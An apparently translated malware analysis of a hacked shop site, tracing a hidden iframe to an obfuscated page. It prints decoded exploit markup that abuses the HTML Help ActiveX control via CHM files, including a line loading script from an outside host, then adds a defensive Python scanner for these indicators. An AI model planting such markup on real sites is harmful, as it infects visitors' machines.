Open the site, view the page source and search for the <iframe tag; you will find this frame: <iframe src="http://www.fengyajade.com/jiaozhu.htm" name="zhu" width="0" height="0" frameborder="0">. This is why antivirus software reports a trojan when the site is opened. On inspection it sits on the last line of index.asp. The frame above loads the local file jiaozhu.htm. Looking at the source of jiaozhu.htm, it is obfuscated: the real markup is stored as an encoded string that the JavaScript unescape() function decodes at run time.
The real code after decoding is:
<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>
<SCRIPT language=VScript src="bbs003302.css"></SCRIPT>
<HTML><BODY><div style="display:none">
<OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>
</BODY></HTML>
Analysing this code, note that when the home page is opened in the local browser two further files are loaded, bbs003302.gif and bbs003302.css; what these two files are and how they were made, I did not have time to investigate. Both hidden OBJECT elements instantiate the HTML Help ActiveX control (the classid shown), and the closing script calls their Click() methods: the first opens file://C:/WINDOWS/Help/apps.chm, a file that ships with the client's own Windows installation, which is how the trojan gets executed, and the second runs a javascript: URL that writes a <SCRIPT src=...> tag into the page. There is a lot of material online about building trojans from CHM files; you can search Baidu for it. Most likely an injection vulnerability in 动感商城 was used to obtain the administrator password, after which an ASP trojan was uploaded, the site's own scripts were modified and the trojan was planted.
This CHM vulnerability is very old; I did not expect anyone to still be using it.
The code this time is:
<SCRIPT LANGUAGE="JavaScript">
<!-- var Words = ""
function OutWord(){var NewWords;NewWords = unescape(Words);alert(NewWords);} OutWord();
// --></SCRIPT>
<HTML><head></head><BODY><div style="display:none">
<OBJECT id="f1" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language = JScript src=///"http://www.sssss.com/af/afsdfu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>f1.Click();setTimeout("f2.Click();",0);</script>
</BODY></HTML>
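As an added, defender-side example (this is not code from the original post), the Python script below does by machine the two steps the analysis above performs by hand: it decodes JavaScript escape()-style strings (%XX and %uXXXX) the way unescape() would, then scans both the page as served and the decoded layer for the indicators seen in these samples: a zero-size iframe, an OBJECT carrying the HTML Help control classid adb880a6-d8ff-11cf-9377-00aa003b7a11, a file:// reference to a .chm, a <SCRIPT src> pointing at an image or stylesheet extension, and calls to unescape()/eval(). The sample documents are constructed for the example; the host name and file names in them are placeholders, not values from the incident.

```python
import re

# JavaScript escape()/unescape() leave these characters untouched.
_JS_ESCAPE_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")
_ESC_SEQ = re.compile(r'%(?:u[0-9A-Fa-f]{4}|[0-9A-Fa-f]{2})')


def js_escape(s: str) -> str:
    """Equivalent of JavaScript escape() for BMP text; used only to build the constructed sample."""
    out = []
    for ch in s:
        if ch in _JS_ESCAPE_SAFE:
            out.append(ch)
        elif ord(ch) < 256:
            out.append("%%%02X" % ord(ch))
        else:
            out.append("%%u%04X" % ord(ch))
    return "".join(out)


def js_unescape(s: str) -> str:
    """Equivalent of JavaScript unescape(): %XX -> Latin-1 char, %uXXXX -> UTF-16 unit.
    urllib.parse.unquote does not understand %uXXXX, hence this small hand-rolled version."""
    def repl(m):
        hexdigits = m.group(1) if m.group(1) is not None else m.group(2)
        return chr(int(hexdigits, 16))
    return re.sub(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})', repl, s)


# HTML Help ActiveX control; the classid used by the OBJECT elements in the samples above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

INDICATORS = {
    "hidden_iframe": re.compile(
        r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0(?:px)?["\'\s>]', re.I),
    "hhctrl_object": re.compile(r'classid\s*=\s*["\']?clsid:' + HHCTRL_CLSID, re.I),
    "local_chm": re.compile(r'file://[^\'"<>\s]+\.chm\b', re.I),
    "script_from_nonscript_ext": re.compile(
        r'<script\b[^>]*\bsrc\s*=\s*["\']?[^"\'>\s]+\.(?:gif|css|jpe?g|png|bmp)\b', re.I),
    "unescape_or_eval": re.compile(r'\b(?:unescape|eval)\s*\(', re.I),
}


def encoded_literals(doc: str) -> list:
    """Return the decoded form of every quoted string literal that carries 4+ %-escapes."""
    decoded = []
    for m in re.finditer(r'"([^"\n]*)"|\'([^\'\n]*)\'', doc):
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        if len(_ESC_SEQ.findall(lit)) >= 4:
            decoded.append(js_unescape(lit))
    return decoded


def scan_html(doc: str) -> dict:
    """Scan the document as served plus one layer of unescape()-decoded literals.
    Returns {indicator_name: [matched snippet, ...]}; an empty dict means nothing fired."""
    findings = {}
    for layer in [doc] + encoded_literals(doc):
        for name, rx in INDICATORS.items():
            for m in rx.finditer(layer):
                findings.setdefault(name, []).append(m.group(0)[:80])
    return findings


# Constructed sample 1: an index page carrying the kind of zero-size frame found in index.asp.
SAMPLE_INDEX = (
    '<html><body><h1>Shop</h1>\n'
    '<iframe src="http://frame.invalid/jiaozhu.htm" name="zhu" width="0" height="0" '
    'frameborder="0"></iframe>\n</body></html>')

# Constructed sample 2: a jiaozhu.htm-style page. The real markup (an HHCtrl OBJECT that opens
# a local CHM, plus a script sourced from a .gif) is stored escape()-encoded in Words and
# written out with unescape() at run time.
_DECODED_FRAME = (
    '<OBJECT id="x" classid="clsid:' + HHCTRL_CLSID + '">'
    '<PARAM name="Command" value="Related Topics, MENU">'
    '<PARAM name="Item1" value=\'command;file://C:/WINDOWS/Help/apps.chm\'></OBJECT>'
    '<SCRIPT language=VBScript src="bbs003302.gif"></SCRIPT>'
    '<SCRIPT>x.Click();</SCRIPT>')
SAMPLE_FRAME = ('<SCRIPT>var Words="' + js_escape(_DECODED_FRAME) +
                '";document.write(unescape(Words));</SCRIPT>')

# Constructed benign page: a visible iframe with normal dimensions should not fire.
SAMPLE_BENIGN = ('<html><body><p>Hello</p>'
                 '<iframe src="/ad.html" width="300" height="250"></iframe></body></html>')

if __name__ == "__main__":
    for label, doc in (("index", SAMPLE_INDEX), ("frame", SAMPLE_FRAME), ("benign", SAMPLE_BENIGN)):
        hits = scan_html(doc)
        print(label, "->", sorted(hits) if hits else "clean")
        for name, snippets in hits.items():
            print("   ", name, ":", snippets[0])
```

The scanner decodes only one layer of escaping, which is what both samples on this page use; nested encodings or String.fromCharCode() construction, as in the javascript: URLs above, need a real script interpreter to unwind, so treat the `unescape_or_eval` indicator as the cue to look deeper rather than as proof on its own.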